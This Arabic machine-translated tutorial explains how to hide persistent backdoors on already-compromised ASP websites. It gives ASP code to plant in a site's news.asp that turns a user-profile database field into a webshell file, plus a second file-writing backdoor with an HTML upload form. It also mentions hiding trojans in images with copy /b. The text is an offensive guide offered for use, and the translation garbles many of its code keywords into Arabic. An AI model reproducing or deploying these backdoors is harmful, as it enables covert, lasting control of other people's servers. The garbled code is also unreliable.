مقدمة: لقد مر وقت طويل، من مدير الموقع الأولي إلى العديد من أبواب ASP الخلفية الشائعة الآن، وأعتقد أن معظم مسؤولي الشبكة يمكنهم تسمية صفحات الويب الكلاسيكية هذه، مثل Haiyang، وVeteran، وBlue Screen، وما إلى ذلك. وأعتقد أيضًا أن معظمهم. يمكن لمسؤولي الشبكة تسميتها. لقد تعلمت طريقة البحث عن الكلمات الرئيسية للبحث عن أحصنة طروادة هذه. بالطبع، إذا كنت تريد إخفاء الباب الخلفي في وقتنا هذا، فأنت بحاجة إلى استخدام بعض المهارات طويل القامة، وأنا طولي قدم واحدة."
لا أنكر أن كتابة حصان طروادة asp في ملف الصورة كما ذكرنا سابقًا هي طريقة جيدة، وفي الواقع، يمكن كتابته ليس فقط في الصور، ولكن أيضًا في ملفات mp3 وملفات doc.
يمكن استخدام طريقةنسخ اسم الملف/المعلمة + اسم الملف/المعلمة لإنشاء اسم الملف
بمرونة لتحقيق الغرض من إخفاء الملفات. المعلمات المحددة هي /a في وضع كود acsic، /b في الوضع الثنائي، لذلك لن أفعل ذلك. لن نخوض في الكثير من التفاصيل، أما بالنسبة لكيفية تحميل webshell، فما هو webshell ليس ضمن نطاق هذه المقالة. ما سنتحدث عنه اليوم هو كيفية وضع الباب الخلفي في قاعدة البيانات باللاحقة .mdb. والفرضية هي أنه بعد أن نحصل على webshell...
كما نعلم، يتعين على العديد من المواقع ملء الكثير من الأشياء عندما تسجيل المستخدمين، مثل: اسم المستخدم، كلمة المرور، QQ، البريد الإلكتروني، الملف الشخصي، رقم الهاتف، معلومات الاتصال، العنوان، إلخ. سيكون هناك أيضًا الجداول والحقول والقيم المقابلة لقاعدة البيانات. ما أريد فعله اليوم هو تسجيل مستخدم وكتابة كود الصدفة في ملفي الشخصي، ثم تعديل ملف على موقعه عند تشغيل هذا الملف، سأضع كود الصدفة في سيرتي الذاتية الشخصية حتى الدليل الحالي.
دون مزيد من اللغط، دعونا نلقي نظرة على الكود:
<%
إذا كان الطلب ("الإجراء") = "فايرفوكس" إذن
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
معرف=request.querystring("id")
idvalue=request.querystring("idv")
مجموعة rs=server.createobject("ADODB.recordset")
sql="اختر "& bname & " من "&tname&" حيث "&id&"="&idvalue&""""
rs.open SQL، كون، 1،3
إن لم يكن rs.eof ثم
المحتوى = رس (اسم)
آخر
رد: اكتب "لا شيء"
نهاية إذا
set fso=Server.createObject("Scripting.FileSystemObject")
تعيين txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(المحتوى)
ملف txt.إغلاق
نهاية إذا
%>
قم بإضافة الكود أعلاه إلى ملف على الموقع، مثل news.asp. وبحسب المعلومات التي نعرفها، بعد التسجيل في موقعها، قم بتنزيل قاعدة البيانات لرؤية الهيكل. اسم Firefox الذي قمت بتسجيله موجود في جدول المستخدم، وقيمة المعرف الخاص به هي 119. حقل الجدول المستخدم لتخزين سيرتي الذاتية المسجلة هو jl.
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
ثم عند استخدامه، يمكننا كتابة webshell اسمه firefox.asp في نفس الدليل مثل news.asp. يمكن القول أن ما ورد أعلاه هو أحد آلاف طرق الإخفاء. بعد ذلك، دعنا نتحدث عن طريقة إخفاء أخرى أكثر ملاءمة. هذه الطريقة لا علاقة لها بلاحقة mdb.
وبالمثل، مازلنا نقوم بتعديل news.asp ونقوم بإدراج التعليمة البرمجية التالية في news.asp الخاص بالطرف الآخر:
<%
إذا كان الطلب ("الإجراء") = "فايرفوكس" إذن
ن=request.form("ن")
ج=request.form("ج")
set fso=Server.createObject("Scripting.FileSystemObject")
تعيين txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(ج)
ملف txt.إغلاق
نهاية إذا
%>
هذا الرمز بسيط نسبيًا، ويمكن اعتباره جانب الخادم لحصان طروادة. استخدم هذا الرمز عند استخدامه:
<HTML><الرأس>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>تحالف Fst Firefox Technology[www.wrsky.com]</title>
<إجراء النموذج =" http://localhost/config.asp?action ...method=post>
<محتوى META = "MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<الجسم> الاسم: <حجم الإدخال = 50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=crows=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
قم بتغيير الكود أعلاه: "http://localhost/config.asp?action= Replace "firefox" بعنوان الخادم الخاص بك واحفظه كملف .htm محلي. بعد فتحه محليًا، حدد اسم الملف ومحتوى الملف والإرسال عن بعد الذي سيتم إنشاؤه. حسنًا، هذه طريقة أخرى لترك الباب الخلفي.